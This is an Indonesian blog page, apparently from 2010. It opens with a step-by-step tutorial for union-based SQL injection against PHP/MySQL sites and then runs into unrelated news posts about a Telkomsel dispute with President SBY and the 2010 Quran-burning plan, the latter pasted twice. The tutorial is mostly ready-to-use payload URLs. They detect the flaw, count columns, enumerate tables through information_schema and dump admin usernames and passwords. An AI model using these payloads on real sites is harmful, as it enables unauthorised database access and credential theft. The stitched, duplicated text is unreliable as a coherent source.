Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:=
===========
carilah target
misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):
==========
=step Dua:=
==========
mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by
contoh:
[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)...
misal:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--
===========
=step Tiga:=
===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============
=step Empat:=
============
untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah "admin"
===========
=step Lima:=
===========
untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
=============
= step Enam: =
=============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :
http://www.v3n0m.net/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--
============
=step Tujuh:=
============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
Contoh :
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--
==============
= step Delapan:=
==============
tahap terakhir mencari halam admin atau login .
Source : CP27
Tuesday, September 21, 2010
Sunday, September 19, 2010
Coreng Citra PT Telkomsel, Presiden Bisa Dituntut
Jakarta, CyberNews. Presiden Susilo Bambang Yudhoyono dapat dituntut atas pencemaran nama baik PT Telkomsel terkait perkataannya yang menyebut jaringan provider seluler itu jelek, bahkan memarahi direktur utamanya.
"Bisa saja menuntut Presiden SBY kalau tidak minta maaf. Soalnya, bagaimana pun nama baik dan citra perusahaan sudah tercoreng. Apalagi, dirutnya dimarah-marahi," kata anggota Fraksi PDIP, Zainun Ahmadi, di Jakarta, Sabtu (18/9).
Hal itu terkait kekesalan Presiden SBY karena tidak bisa melakukan teleconference saat sidak pengamanan arus mudik di Cikopo, Cikampek, Jawa Barat, Jumat (17/9) dengan sejumlah Polda gara-gara kerusakan jaringan komunikasi.
Saat itu SBY menanyakan Dirut PT Telkom dan Telkomsel dan meminta agar jangan hanya duduk di belakang meja saja. Namun, hal tersebut dibantah pihak Telkomsel dengan menyebar siaran pers, bahwa jaringannya tidak dipakai teleconference Presiden.
"Setelah dilakukan pengecekan, telekonferensi yang dilakukan oleh Presiden tersebut, ternyata tidak menggunakan jaringan layanan 3G Telkomsel. Telkomsel menghargai perhatian Presiden atas kualitas layanan yang selama ini diberikan Telkomsel untuk melayani kepentingan masyarakat Indonesia," kata Singue Kilatmaka, External Corporate Communications PT Telkomsel.
( PKT /CN16 )
Source : Suara Merdeka
Thursday, September 9, 2010
Rencana Pembakaran Al Qur’an Sedunia 11 September (Video)
Rencana Pembakaran Al Qur’an Sedunia 11 September. Gerakan kontroversional rencana pembakaran Al Qur’an sedunia oleh sebuah sekte kecil di Gereja Florida Amerika Serikat, pimpinan Pendeta Terry Jones yang dinamakan “International Burn The Qur’an Day” atau “Hari Pembakaran Al Qur’an Sedunia”, untuk memperingati tragedi 11 September.
Rencana Pembakaran Al Qur'an Sedunia 11 September
Aksi yang merencanakan pembakaran Al Qur’an sedunia tersebut mendapat kecaman dari berbagai pihak, tidak hanya dari umat muslim di dunia tapi juga dari para pemimpin umat kristen, baik yang berlatar belakang liberal maupun konservatif.
Pendeta Michael Kinnamon, Sekretaris Jenderal Dewan Gereja Amerika Serikat mengatakan, pihaknya kembali menegaskan sikap penentangan aksi pembakaran tersebut. Bahkan ia berani untuk mengatakan bahwa pernyataannya ini mewakili jutaan warga AS yang menolak ekspresi anti-muslim yang ditunjukkan sekte itu. Tindakan membakar Qur’an di mata Michael adalah reaksi orang yang ketakutan sekaligus salah paham terhadap sifat sejati ajaran Islam yang damai.
Sikap kecaman dan penolakan juga ditunjukkan organisasi National Association of Evangelical yang berbasis di AS.
“Rencana untuk membakar Al Qur’an pada 11 September menunjukkan sikap tidak hormat kepada saudara muslim dan justru akan meningkatkan ketegangan antara umat Kristen dan Islam di seluruh dunia,” “Kami menuntut rencana pembakaran itu dibatalkan.” kata organisasi itu dalam pernyataannya.
Umat muslim di seluruh dunia juga telah bergerak. Mereka menentang dan memprotes rencana pembakaran Al Qur’an. Senin lalu ratusan warga Afghanistan berkumpul di ibukota Kabul untuk mengecam pembakaran Al Qur’an. Mereka berteriak, “Hidup Islam” dan “Matilah Amerika”.
Berikut beberapa video rencana pembakaran Al Qur’an Sedunia oleh Pendeta Terry Jones.
Kebencian dan kemarahan dalam bentuk apapun sejatinya tidak akan pernah menyelesaikan masalah selain menyulut kemarahan dan kebencian yang lebih besar. Alangkah indahnya jika kerukunan antar umat beragama itu boleh tercipta di seluruh dunia. Damainya bumi ini akan menjadi sebuah kehidupan yang indah dan lebih baik bagi segenap umat manusia.
Rencana Pembakaran Al Qur'an Sedunia 11 September
Aksi yang merencanakan pembakaran Al Qur’an sedunia tersebut mendapat kecaman dari berbagai pihak, tidak hanya dari umat muslim di dunia tapi juga dari para pemimpin umat kristen, baik yang berlatar belakang liberal maupun konservatif.
Pendeta Michael Kinnamon, Sekretaris Jenderal Dewan Gereja Amerika Serikat mengatakan, pihaknya kembali menegaskan sikap penentangan aksi pembakaran tersebut. Bahkan ia berani untuk mengatakan bahwa pernyataannya ini mewakili jutaan warga AS yang menolak ekspresi anti-muslim yang ditunjukkan sekte itu. Tindakan membakar Qur’an di mata Michael adalah reaksi orang yang ketakutan sekaligus salah paham terhadap sifat sejati ajaran Islam yang damai.
Sikap kecaman dan penolakan juga ditunjukkan organisasi National Association of Evangelical yang berbasis di AS.
“Rencana untuk membakar Al Qur’an pada 11 September menunjukkan sikap tidak hormat kepada saudara muslim dan justru akan meningkatkan ketegangan antara umat Kristen dan Islam di seluruh dunia,” “Kami menuntut rencana pembakaran itu dibatalkan.” kata organisasi itu dalam pernyataannya.
Umat muslim di seluruh dunia juga telah bergerak. Mereka menentang dan memprotes rencana pembakaran Al Qur’an. Senin lalu ratusan warga Afghanistan berkumpul di ibukota Kabul untuk mengecam pembakaran Al Qur’an. Mereka berteriak, “Hidup Islam” dan “Matilah Amerika”.
Berikut beberapa video rencana pembakaran Al Qur’an Sedunia oleh Pendeta Terry Jones.
Kebencian dan kemarahan dalam bentuk apapun sejatinya tidak akan pernah menyelesaikan masalah selain menyulut kemarahan dan kebencian yang lebih besar. Alangkah indahnya jika kerukunan antar umat beragama itu boleh tercipta di seluruh dunia. Damainya bumi ini akan menjadi sebuah kehidupan yang indah dan lebih baik bagi segenap umat manusia.
Subscribe to:
Comments (Atom)
